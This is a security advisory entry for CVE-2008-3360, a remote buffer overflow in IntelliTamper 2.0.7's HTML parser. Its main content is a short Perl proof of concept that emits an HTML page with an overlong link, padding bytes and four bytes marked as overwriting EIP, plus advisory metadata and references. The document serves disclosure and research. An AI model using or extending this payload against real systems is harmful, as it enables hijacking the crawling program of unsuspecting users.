Topic : | IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC
|
SecurityAlert : 4058
CVE : CVE-2008-3360
CWE : CWE-119
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : Yes
Credit : k`sOSe
Published : 31.07.2008
Affected Software : | Intellitamper, Intellitamper, 2.0.7 |
 Advisory Content : #!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# This is NOT http://secunia.com/advisories/20172/.
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.
use warnings;
use strict;
my $evil_html = '<html><head><title>ph33r</title></head><body>' .
'<a href="http://google.it/' .
"\x41" x 450 .
"\x42" x 4 . # EIP
'.htm">ph33r</a>' .
"</body></html>";
print $evil_html;
References :
http://securityreason.com/expldownload/1/4375/1 (Exploit)
http://www.securitytracker.com/id?1020521
http://www.securityfocus.com/bid/30317
http://www.milw0rm.com/exploits/6121
http://www.milw0rm.com/exploits/6116
http://www.milw0rm.com/exploits/6103
http://www.frsirt.com/english/advisories/2008/2120/references
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|